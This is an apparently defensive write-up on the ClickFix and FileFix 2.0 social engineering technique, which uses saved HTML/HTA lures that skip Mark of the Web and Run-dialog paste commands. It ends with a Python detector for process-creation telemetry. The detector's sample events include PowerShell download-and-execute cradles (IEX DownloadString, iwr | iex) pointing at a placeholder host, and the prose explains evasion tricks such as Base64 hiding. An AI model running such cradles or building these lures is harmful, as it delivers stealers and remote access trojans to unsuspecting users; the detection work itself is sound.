A new variant of the ClickFix social engineering attack manipulates users into bypassing browser security by copying and executing commands (PowerShell one-liners, HTA files, or mshta.exe invocations) from fake verification pages. These deceptive prompts appear as CAPTCHAs or error messages and walk victims through keystrokes such as Win+R, Ctrl+V, and Enter. The spin-off is effective because it exploits human trust in familiar browser behaviors and sidesteps endpoint protections that key on the browser's download path. Further refinements of the technique should be expected.
The ClickFix spin-off, dubbed FileFix 2.0 by security researcher Mr.d0x, takes advantage of a lesser-known quirk in modern browsers' "Save As" functionality. When a user saves a webpage (Ctrl+S or right-click → Save as), Chrome and Edge often do not attach the Mark of the Web (MoTW) zone identifier that Windows uses to flag Internet-sourced files as potentially unsafe. Without this marker, the saved file opens with no SmartScreen or security-warning prompt, so an attacker can craft a page that looks benign, such as a "Backup Codes" screen or a CAPTCHA prompt, but carries embedded attacker-controlled script. Once the user saves and opens the file, that script runs outside the browser's normal security checks: a file saved as an HTML Application (.hta) is handed to mshta.exe rather than rendered by the browser, so the embedded script executes with the user's full local privileges and none of the browser sandboxing that would have constrained it on the original page.
In one variation of this technique, the attacker presents a cloned authentication page, complete with Google or Microsoft logos and styling, that tells users to save their one-time backup codes for safekeeping. Because the page's title tag supplies the default filename in the Save dialog, users end up with a file named "Save Backup Codes.html", reinforcing the illusion of legitimacy. When the file is opened through its local handler (mshta.exe for an HTA, the browser for plain HTML; only the former executes system commands, a plain HTML file rendered by the browser stays inside the renderer sandbox), the hidden script launches PowerShell, which downloads and runs a secondary payload, commonly an information stealer or remote access trojan, with no visible prompt or security warning.
Another spin-off mimics fake browser "update" or error messages, instructing users to open the Windows Run dialog (Win+R), paste a command the page has already placed on the clipboard, and press Enter, exactly as the original ClickFix does. Instead of relying solely on in-browser JavaScript for the initial fetch, however, FileFix 2.0 delivers a local HTML file, so the commands execute outside the browser's normal download-and-execute model. Because the file arrives via Save As rather than as a download, there is no download event for Safe Browsing or the download-warning UI to inspect at the moment of execution, and the Content Security Policy of the served page no longer applies once the script runs from the local file.
Because the saved file lacks MoTW, even corporate environments that enforce strict download controls can be bypassed. Endpoint protection tools rarely flag locally opened HTML files as suspicious, and static analysis of the HTML appears benign. The truly malicious content, script that invokes mshta.exe, powershell.exe, or hidden HTA files, is only revealed at runtime, blending in with legitimate user behavior. Adding to the stealth, the attacker can hide the payload URL and commands in Base64-encoded snippets that are decoded client-side only when the user opens the file (Base64 is an encoding, not encryption, so an analyst can recover the strings trivially, but it defeats naive keyword matching on the file). This on-demand, user-assisted execution chain is an evolution of ClickFix: it relies on social engineering rather than software flaws, and it shows that the user remains the weakest link in browser security.
This spin-off amplifies the ClickFix threat by turning a handful of ordinary keystrokes into a silent, user-driven command-execution chain that browser and endpoint defenses do not see. Attackers can deliver powerful payloads by persuading users to perform simple actions that are hard to prevent with technical controls alone. The range of malware deployed, from stealthy information stealers to full-featured RATs and ransomware, means that a single misstep can cascade into full network compromise.
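The saved-file chain and the Run-dialog variant above both leave process-creation telemetry that is hard to hide, since the lure file has to be handed to mshta.exe and the second stage has to be spawned from it. The following detection logic is an added example, not code from the original page or from Mr.d0x's research. It scans constructed process-creation events (the field names loosely follow Sysmon Event ID 1 and are an assumption, as are the folder list, the cradle keyword list and the sample events) for three hops: explorer.exe launching mshta.exe on an .hta/.html file in a user-writable folder, mshta.exe spawning a shell that runs a download cradle, and explorer.exe (the parent of anything started from Win+R) spawning a shell or mshta.exe with a cradle or URL on the command line. PowerShell -EncodedCommand arguments are decoded (UTF-16LE base64) before the cradle check, so the Base64 obfuscation described above does not hide the download.

```python
"""Added example: detect FileFix 2.0 / ClickFix execution hops in process-creation events.

Field names approximate Sysmon Event ID 1 (assumption); sample events are constructed.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Folders a browser "Save As" normally writes to (assumed list); the lure lives here, not under Program Files.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(Downloads|Desktop|Documents|AppData)\\", re.I)
LURE_EXT = (".hta", ".html", ".htm")
SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
# Common PowerShell download-and-execute primitives; a short list, extend for your environment.
CRADLE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|\bcurl\b|\bIEX\b|Invoke-Expression)",
    re.I,
)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Event:
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or not valid UTF-16LE base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _is(image: str, *names: str) -> bool:
    return image.lower().endswith(names)


def opened_saved_lure(ev: Event) -> bool:
    """explorer.exe -> mshta.exe on an .hta/.html file in a user-writable folder (FileFix 2.0, first hop)."""
    target = ev.command_line.lower().rstrip('"')
    return (_is(ev.image, "mshta.exe") and _is(ev.parent_image, "explorer.exe")
            and target.endswith(LURE_EXT) and USER_WRITABLE.search(ev.command_line) is not None)


def detect(events):
    """Return (rule, pid) findings; the mshta -> shell hop is linked through ppid."""
    by_pid = {ev.pid: ev for ev in events}
    findings = []
    for ev in events:
        if opened_saved_lure(ev):
            findings.append(("mshta_opened_saved_lure", ev.pid))
        if not _is(ev.image, *SHELLS):
            continue
        # Look at the visible command line plus any decoded -EncodedCommand payload.
        visible = ev.command_line + " " + (decode_encoded_command(ev.command_line) or "")
        cradle = CRADLE.search(visible) is not None or "://" in visible
        parent = by_pid.get(ev.ppid)
        if parent is not None and _is(parent.image, "mshta.exe"):
            findings.append(("mshta_spawned_download_cradle" if cradle else "mshta_spawned_shell", ev.pid))
        elif cradle and _is(ev.parent_image, "explorer.exe"):
            findings.append(("run_dialog_shell_with_cradle", ev.pid))
    return findings


# Constructed sample telemetry (not real captures). example.invalid is a reserved test domain.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    Event(4001, 900, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe", "explorer.exe"),
    # FileFix 2.0: victim double-clicks the saved lure; with no MoTW, no warning precedes this event
    Event(4120, 4001, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          r'"C:\Windows\System32\mshta.exe" "C:\Users\alice\Downloads\Save Backup Codes.hta"'),
    Event(4133, 4120, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\mshta.exe", f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    # Benign: vendor help file outside user-writable folders
    Event(4200, 4001, r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
          r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'),
    # Benign: an admin running a cmdlet from the Run dialog
    Event(4300, 4001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", "powershell.exe -NoProfile -Command Get-Process"),
    # Classic ClickFix: Win+R, Ctrl+V, Enter with a clipboard-injected cradle
    Event(4400, 4001, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe", 'powershell.exe -w hidden -c "iwr http://example.invalid/s | iex"'),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Run against the sample events, this flags the saved-lure launch (pid 4120), the mshta-spawned download cradle (pid 4133, found only because the encoded command is decoded first) and the Run-dialog cradle (pid 4400), and stays quiet for the vendor HTA under Program Files and the admin's Get-Process. The parent-image check matters: the Run dialog, a double-click in Explorer and a saved lure all surface as children of explorer.exe, which is what makes these hops distinguishable from script-host activity started by management tooling.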
https://sra.io/blog/beware-of-clickfix-a-growing-social-engineering-threat/